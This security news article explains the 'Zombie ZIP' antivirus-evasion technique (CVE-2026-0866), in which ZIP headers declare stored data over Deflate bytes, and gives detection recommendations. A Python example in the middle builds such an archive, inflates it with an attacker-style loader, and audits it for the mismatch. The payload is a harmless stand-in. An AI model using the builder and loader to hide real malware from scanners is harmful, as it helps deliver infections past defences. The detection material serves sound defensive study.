Zombie ZIP: How a Malicious ZIP Archive Attack Evades Antivirus and EDR

CyberSecureFox 🦊

A new attack technique against ZIP archives, dubbed Zombie ZIP, demonstrates how seemingly harmless file formats can be weaponised to deliver malware while slipping past antivirus and endpoint detection and response (EDR) tools. The method, presented by security researcher Chris Aziz from Bombadil Systems, exploits how many security solutions trust ZIP file headers instead of validating the actual data inside the archive.

What Is Zombie ZIP? ZIP Header Manipulation Explained

The ZIP format is one of the most widely used archive types, supported by virtually every modern operating system, mail server and file-sharing platform. Each entry in a ZIP file carries headers that describe it, including the compression method (0 for STORED, 8 for Deflate), the compressed and uncompressed sizes, and a CRC-32 checksum that the specification defines over the entry's uncompressed data.

Zombie ZIP abuses these headers to create a form of content–header confusion. In the attack, the entry's Method field is set to 0 (STORED), which formally declares that the data is stored uncompressed. In reality, the bytes in the entry are a raw Deflate stream, exactly what a method 8 entry would contain.

Many antivirus and EDR engines assume the header is truthful. They attempt to scan the payload as if it were raw, uncompressed bytes. Because the data is actually compressed, the scanner sees only compressed “noise” rather than readable code or file structures. Signature-based detection, heuristic rules and even some machine-learning models are far less effective when the underlying data is not decoded correctly.

Why Standard ZIP Tools Fail While Malware Loaders Succeed

When a user or administrator tries to open such a Zombie ZIP archive with common tools like WinRAR, 7-Zip or the Unix unzip utility, the operation often fails. The tools may display errors, extract corrupted files or report an unsupported method. This behaviour is a direct consequence of the lie in the header: a tool that honours method 0 copies the entry's bytes out as the file itself, and those bytes do not match the CRC-32 stored in the header.

The CRC-32 in a Zombie ZIP is the checksum of the real, uncompressed payload, as the format requires, not of the Deflate bytes actually sitting in the entry. A standards-compliant tool checksums those Deflate bytes, sees a mismatch, and treats the archive as damaged or malformed, so it either refuses to extract the entry or marks the output as corrupt.

An attacker-controlled loader, however, can be written to ignore the declared compression method and interpret the data stream as Deflate regardless of what the header says. This custom loader can fully reconstruct the hidden payload and execute it. Meanwhile, many security products will have already logged the file as “scanned” and found nothing malicious, because they never decoded the content correctly.

Proof-of-Concept and Ease of Weaponisation

The researcher has released a proof-of-concept (PoC) implementation of Zombie ZIP on GitHub, including example archives and technical documentation of the approach. This lowers the barrier for threat actors, who no longer need deep expertise in the ZIP specification to adopt the technique.

Zombie ZIP can be integrated into phishing campaigns, malware downloaders and exploit kits. For example, a phishing email may carry a ZIP attachment that appears broken to end users and standard tools but extracts perfectly via the attacker’s loader after being dropped on the endpoint by another component in the infection chain.

CVE-2026-0866 and CERT/CC Assessment of the Zombie ZIP Vulnerability

The CERT Coordination Center (CERT/CC) has issued an advisory for this technique and assigned it the identifier CVE-2026-0866. According to CERT/CC, Zombie ZIP is a modern variation of older archive-processing weaknesses, similar in concept to CVE-2004-0935 that affected early versions of ESET antivirus more than two decades ago.

Importantly, CERT/CC emphasises that the ZIP standard itself is not inherently vulnerable. The core issue lies in how security products and extraction tools over-trust header information and sometimes fail to validate that the archive structure and data stream are consistent. Some contemporary decompression libraries already detect such inconsistencies and flag the file as malformed or suspicious, but coverage across the ecosystem is uneven.

Security Impact and Defensive Recommendations Against Zombie ZIP

For vendors of antivirus, EDR, secure email gateways and file analysis sandboxes, Zombie ZIP highlights the need for more robust archive parsing. Defensive measures should include at least the following:

1. Validate the declared compression method against the actual data stream. Engines should not only read the Method field but also attempt to parse the content accordingly. If the data of a "stored" entry parses as a complete Deflate stream, that discrepancy should be treated as a strong indicator of abuse; if the inflated output also matches the entry's CRC-32, the mismatch is conclusive, because the header checksum is defined over uncompressed data and the header is therefore describing a file that only appears after inflation.

2. Enforce structural integrity checks for ZIP archives. Systematically verifying header fields, length values and CRC checksums can uncover anomalies typical of antivirus bypass and payload obfuscation strategies. Archives that do not pass consistency checks should be quarantined or blocked at gateways.

3. Use more aggressive multi-path scanning for high-risk channels. In environments such as email gateways, web proxies and download inspection points, it is advisable to attempt decompression using multiple strategies or libraries and compare the results. Although this adds computational overhead, it significantly reduces the attack surface for archive-based evasion techniques.
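As an added, self-contained example (not the article's text and not the researcher's PoC code), the following Python builds a one-entry archive that lies in exactly the way described in the Zombie ZIP sections above, a STORED header over a raw Deflate stream with the CRC-32 of the real payload, and then shows what a spec-honouring reader, an attacker-style loader and the consistency checks of recommendations 1 and 2 each make of it. The entry name, the payload bytes and every header value other than the format's fixed field layout are constructed for this example; the layout itself follows the published ZIP application note.

```python
"""Added example: a ZIP whose local header claims STORED while the entry bytes
are a raw Deflate stream, compared across three readers (spec-honouring,
attacker loader, consistency audit). Payload, entry name and header values
other than the fixed ZIP field layout are constructed for this example."""
import io
import struct
import zipfile
import zlib

LOCAL_SIG, CENTRAL_SIG, EOCD_SIG = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
STORED, DEFLATED = 0, 8

# Constructed stand-in for a malware payload. It starts with "MZ" so a scanner
# looking at the *real* bytes would see a PE-style marker; in the zombie
# archive the raw entry bytes are Deflate output and carry no such marker.
PAYLOAD = b"MZ" + b"constructed stand-in for a PE payload, not real code " * 8
NAME = b"invoice.exe"  # hypothetical entry name


def raw_deflate(data: bytes) -> bytes:
    """Raw Deflate (wbits=-15, no zlib header), which is what ZIP method 8 stores."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def build_zip(name: bytes, on_disk: bytes, method: int, crc: int, usize: int) -> bytes:
    """Single-entry ZIP. `on_disk` is written verbatim; method, CRC and
    uncompressed size go into both headers unchecked, so the caller can lie."""
    csize = len(on_disk)
    local = LOCAL_SIG + struct.pack("<HHHHHIIIHH", 20, 0, method, 0, 0x21, crc,
                                    csize, usize, len(name), 0) + name + on_disk
    central = CENTRAL_SIG + struct.pack("<HHHHHHIIIHHHHHII", 20, 20, 0, method, 0, 0x21,
                                        crc, csize, usize, len(name), 0, 0, 0, 0, 0, 0) + name
    eocd = EOCD_SIG + struct.pack("<HHHHIIH", 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + eocd


def zombie_zip(name: bytes, payload: bytes) -> bytes:
    """Header says STORED, bytes are Deflate. The CRC-32 is that of the real
    payload: ZIP defines it over uncompressed data, so a loader can still verify."""
    return build_zip(name, raw_deflate(payload), STORED, zlib.crc32(payload), len(payload))


def honest_zip(name: bytes, payload: bytes) -> bytes:
    """Same bytes under a truthful method 8 header, for comparison."""
    return build_zip(name, raw_deflate(payload), DEFLATED, zlib.crc32(payload), len(payload))


def standard_read(archive: bytes, name: str):
    """A spec-honouring reader (Python's zipfile): trusts method 0, checksums
    the raw bytes, and rejects the entry. Returns the data or the error text."""
    try:
        with zipfile.ZipFile(io.BytesIO(archive)) as zf:
            return zf.read(name)
    except zipfile.BadZipFile as e:
        return f"BadZipFile: {e}"


def iter_local_entries(archive: bytes):
    """Walk local file headers the way a streaming gateway scanner would
    (assumes no data descriptors, i.e. flag bit 3 clear).
    Yields (name, method, crc, csize, usize, entry_bytes)."""
    pos = 0
    while archive[pos:pos + 4] == LOCAL_SIG:
        _, _, method, _, _, crc, csize, usize, nlen, xlen = struct.unpack_from(
            "<HHHHHIIIHH", archive, pos + 4)
        start = pos + 30 + nlen + xlen
        yield archive[pos + 30:pos + 30 + nlen], method, crc, csize, usize, archive[start:start + csize]
        pos = start + csize


def attacker_loader(archive: bytes) -> bytes:
    """Ignores the declared method and inflates whatever bytes are there."""
    blob = next(iter_local_entries(archive))[5]
    return zlib.decompress(blob, -15)


def try_inflate(blob: bytes):
    """The inflated bytes if `blob` is a complete raw Deflate stream, else None."""
    d = zlib.decompressobj(-15)
    try:
        out = d.decompress(blob)
    except zlib.error:
        return None
    return out if d.eof else None


def audit(archive: bytes) -> list:
    """Header/data consistency checks (recommendations 1 and 2). Returns
    (name, finding) pairs; an empty list means headers and data agree."""
    findings = []
    for name, method, crc, csize, usize, blob in iter_local_entries(archive):
        n = name.decode("cp437")
        if method == STORED:
            if csize != usize:
                findings.append((n, "STORED entry: compressed and uncompressed sizes differ"))
            if zlib.crc32(blob) != crc:
                findings.append((n, "STORED entry: CRC-32 of raw bytes does not match header"))
            inflated = try_inflate(blob)
            if inflated is not None:  # raw bytes parse as a complete Deflate stream
                verdict = "matches" if zlib.crc32(inflated) == crc else "does not match"
                findings.append((n, f"STORED entry inflates as Deflate; header CRC {verdict} inflated data"))
        elif method == DEFLATED:
            inflated = try_inflate(blob)
            if inflated is None or zlib.crc32(inflated) != crc:
                findings.append((n, "DEFLATED entry does not inflate to the declared CRC-32"))
    return findings


if __name__ == "__main__":
    z = zombie_zip(NAME, PAYLOAD)
    print("standard reader:", standard_read(z, NAME.decode()))
    print("attacker loader:", attacker_loader(z)[:40])
    for n, f in audit(z):
        print("audit:", n, "-", f)
```

Run stand-alone, the script shows the three views side by side: zipfile rejects the entry with a CRC error, the loader recovers the full payload by ignoring the method field, and the audit reports the size mismatch, the raw-byte CRC mismatch and, decisively, that the "stored" bytes inflate to data matching the header CRC. The same audit returns nothing for the honest archive, which is the property a gateway filter needs: it blocks on provable header/data disagreement rather than on any single field value.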

For enterprises and end users, Zombie ZIP is a reminder to treat ZIP archives from untrusted or unknown sources with caution. If an archive repeatedly throws errors like “unsupported method” or appears corrupted when opened with reputable tools, it should be deleted and, where possible, forwarded to the security team for deeper analysis rather than repeatedly “force-opened.” Hardening email policies, enforcing attachment scanning on gateways, and keeping security products updated with improved archive parsers are practical safeguards.

The emergence of Zombie ZIP underlines a broader lesson: blindly trusting file headers and formats can be exploited to undermine security controls. Organisations that proactively review how their tools handle archives, adopt stricter content validation and monitor for new evasion techniques like CVE-2026-0866 will be better positioned to contain archive-borne threats and maintain a resilient security posture.
